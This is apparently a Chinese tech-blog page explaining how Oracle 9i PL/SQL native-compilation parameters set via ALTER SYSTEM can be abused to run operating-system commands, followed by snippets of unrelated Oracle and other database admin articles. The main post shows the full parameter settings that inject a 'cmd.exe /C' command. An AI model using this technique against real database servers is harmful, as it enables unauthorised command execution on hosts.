使用ALTER SYSTEM运行OS命令

最新推荐文章于 2020-06-30 21:59:38 发布
最新推荐文章于 2020-06-30 21:59:38 发布
阅读量87 收藏
点赞数
文章标签: 数据库
本文通过一个具体的案例展示了如何在Oracle 9i中利用特定的系统参数设置来执行操作系统命令,进而实现SQL注入攻击。虽然Oracle 10g中已废弃了相关参数,但该方法仍具有一定的参考价值。
这里举出一个攻击代码例子,你也许会觉得惊奇,抑或认为这是一个运行命令的好办法,是的它很“有用”。 在Oracle 9i中允许采用Oracle本地编译PL/SQL应用程序的方式进行操作。显然,可以利用这一点来运行OS命令: SQL> alter system set plsql_native_make_utility='cmd.exe /C dir >C:\oops.txt &'; SQL> alter system set plsql_native_make_file_name=' foo'; SQL> alter system set plsql_native_library_dir='bee'; 系统已更改。 create or replace PROCEDURE wcg IS BEGIN NULL; END; / show errors 在Oracle编译wcg过程的时候,Oracle会执行下面的代码: cmd.exe /C dir > C:\oops.txt -& -f foo bee/RUN_CMD__SYSTEM__0.DLL Oracle10g中 plsql_native_make_utility与plsql_native_make_file_name2个参数已被废弃。
Oracle DBA之手动注册监听(listener) -- alter system set local_listener="T02";
t0nsha's Blog
07-24 1万+
记录下刚刚做的一个为一个数据库(t02)配置多个监听(listener)的实验,过程有点小曲折。 (1)新增两个测试的监听,listener.ora的配置内容(可纯手动编辑该文件或使用netca)如下:(LISTENER为系统原有;L1、L2为测试用新增的监听)# listener.ora Network Configuration File: D:\oracle\product\10.2.0\d
alter system set 参数=XX‘命令的本质以及参数文件中SID和*两类前缀名优先级
haiross的专栏
12-04 9915
1、’altersystem set 参数=XX‘这个命令的本质 ’altersystem set 参数=XX‘这个命令操作的对象是参数文件, 所以 即使sga_TARGET默认值为0,但是altersystem set sga_TARGET=0修改的结果还是会记录在参数文件中,即参数文件中有一条记录为sga_TARGET=0。       2、alter system se
在PL/SQL中存在v$,alter sytem之类的命令
cotchte0421的博客
09-09 114
create or replace procedure kill_lock_all issqlstat varchar2(500);beginfor cur in (select a2.MACHINE, a3.o...
PLSQL连接oracle数据库会话超时处理
SirLZF的博客
06-30 4077
1.指定开启资源限制。该改变对密码资源无效,密码资源总是可用。 alter system set resource_limit=true; (默认不打开) 2.创建PROFILE create profile test limit idle_time 30 connect_time 480; 注:必须要有create profile 权限,才能创建profile。 3.指定用户PROFILE alter user test profile test; 4.修改PROFILE alter pro
alter system的常用命令
xionglang7的专栏
03-05 6084
Alter system archive log [start|stop|all|...] alter system archive log all; alter system archive log next; alter system archive log sequence 104; alter system archive log current; alter system
如何安全快速的批量删除Oracle数据库外部会话session
12-14
-- 在这里添加操作,如 ALTER SYSTEM KILL 或者 OS 操作 DBMS_OUTPUT.PUT_LINE('SID: ' || rec.sid || ', Serial#: ' || rec.serial#); END LOOP; END; / ``` 在处理大量会话时,为了确保数据一致性并快速释放...
oracle dba 应该熟悉的命令
01-19
1 运行SQLPLUS工具 sqlplus 2 以OS的默认身份连接 / as sysdba 3 显示当前用户名 show user 4 直接进入SQLPLUS命令提示符 sqlplus /nolog 5 在命令提示符以OS身份连接 connect / as sysdba 6 以SYSTEM的身份连接 ...
达梦数据库日常运维使用命令
最新发布
05-30
ALTER SYSTEM SET 'PWD_POLICY' = 15 BOTH; ``` 此命令无需重启数据库即可生效,确保用户的密码符合安全要求[^5]。 #### 6. 查看当前用户权限 了解当前用户的权限分配情况: ```sql SELECT PRIVILEGE FROM USER_SYS...
C:\Windows\System32>SELECT Host,User FROM mysql.user WHRER User='root'; 'SELECT' 不是内部或外部命令,也不是可运行的程序 或批处理文件。
05-12
ALTER USER 'root'@'localhost' IDENTIFIED BY 'new_secure_password'; FLUSH PRIVILEGES; ``` 4. **恢复正常运作模式**: 终止刚才的手动启动流程,并依照常规手段开启服务: ```cmd net stop mysql ...
Oracle学习笔记——Oracle高级
z742182637的博客
01-07 549
1.视图: 视图实际上是一条查询语句,是数据的显示方式,是数据库中的虚表。 视图的作用:安全,方便,一致性。 (1).创建视图: create [or replace] view 视图名 as SQL查询语句…… 为确保视图选项一致性,加上“with check option”。 (2).视图的约束: a.当组成视图的表是两个或两个以上时,不能通过视图对两个或两个以上的基表做
【转自运维技术 - HackRoad.com】PostgreSQL中使用ALTER SYSTEM修改系统参数
msdnchina的专栏@JiNan,ShanDong
02-18 1013
本文转自https://blog.hackroad.com/operations-engineer/linux_server/13212.html在PostgreSQL9.5之前的版本中,修改系统参数一般的步骤是:1、连接到PostgreSQL数据库服务器;2、打开postgresql.conf文件,找到需要修改的参数,修改参数的值为所需要的值;3、执行restart或reload使修改生效;...
PLSQL执行sql的几种方法
热门推荐
john2522的专栏
02-02 4万+
plsql很方便我们执行sql。下面就简单介绍我常用的几种(当然每次svn的分支也可以ant脚本自动执行某个文件下的所以sql文件) 首先打开plsq的命令窗口 1)执行sql文件(可以把需要执行的sql放一个文件中) 输入 @''   在单引号中输入sql文件的路径既可,比如D:\db下的jbpm.oracle.sql文件,见下图(sql文件内容是select * from syste
PL/SQL 查询session杀不掉,强制终止线程的解决方法
wonchenchu的专栏
02-03 1万+
前几天用PL/SQL跨库查询批量插入另一张表时出现卡住情况,十几分钟了没有反应。解决方法: 1.查询出锁表session的SID,SERIAL# SELECT /*+ rule */ s.username, decode(l.type,'TM','TABLE LOCK', 'TX','ROW LOCK', NULL) LOCK_LEVEL, o.owner,o.object_name,
oracle alter session和alter system的参数详解
gcgl000hugang12345的专栏
06-14 8294
查看系统参数方法: 查看某一个参数值:SHOW PARAMETER db_block_size; 查看多个相关参数值:SHOW PARAMETERS block; 修改系统参数的方法: ALTER SESSION SET parameter_name = value ALTER SYSTEM SET parameter_name = value [DEFERRED
alter system kill session[查杀会话进程]
HeartMa′Blog
03-30 3万+
最近公司服务器出现内存被大量占用,数据无法写入,初步怀疑是有部分会话锁死导致,通过以下两步即可解决: 一、查询哪些会话锁死 select * from v$session t1, v$locked_object t2 where t1.sid = t2.SESSION_ID --查询哪些表锁死 二、杀掉对应的会话进程 alter system kill session '
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值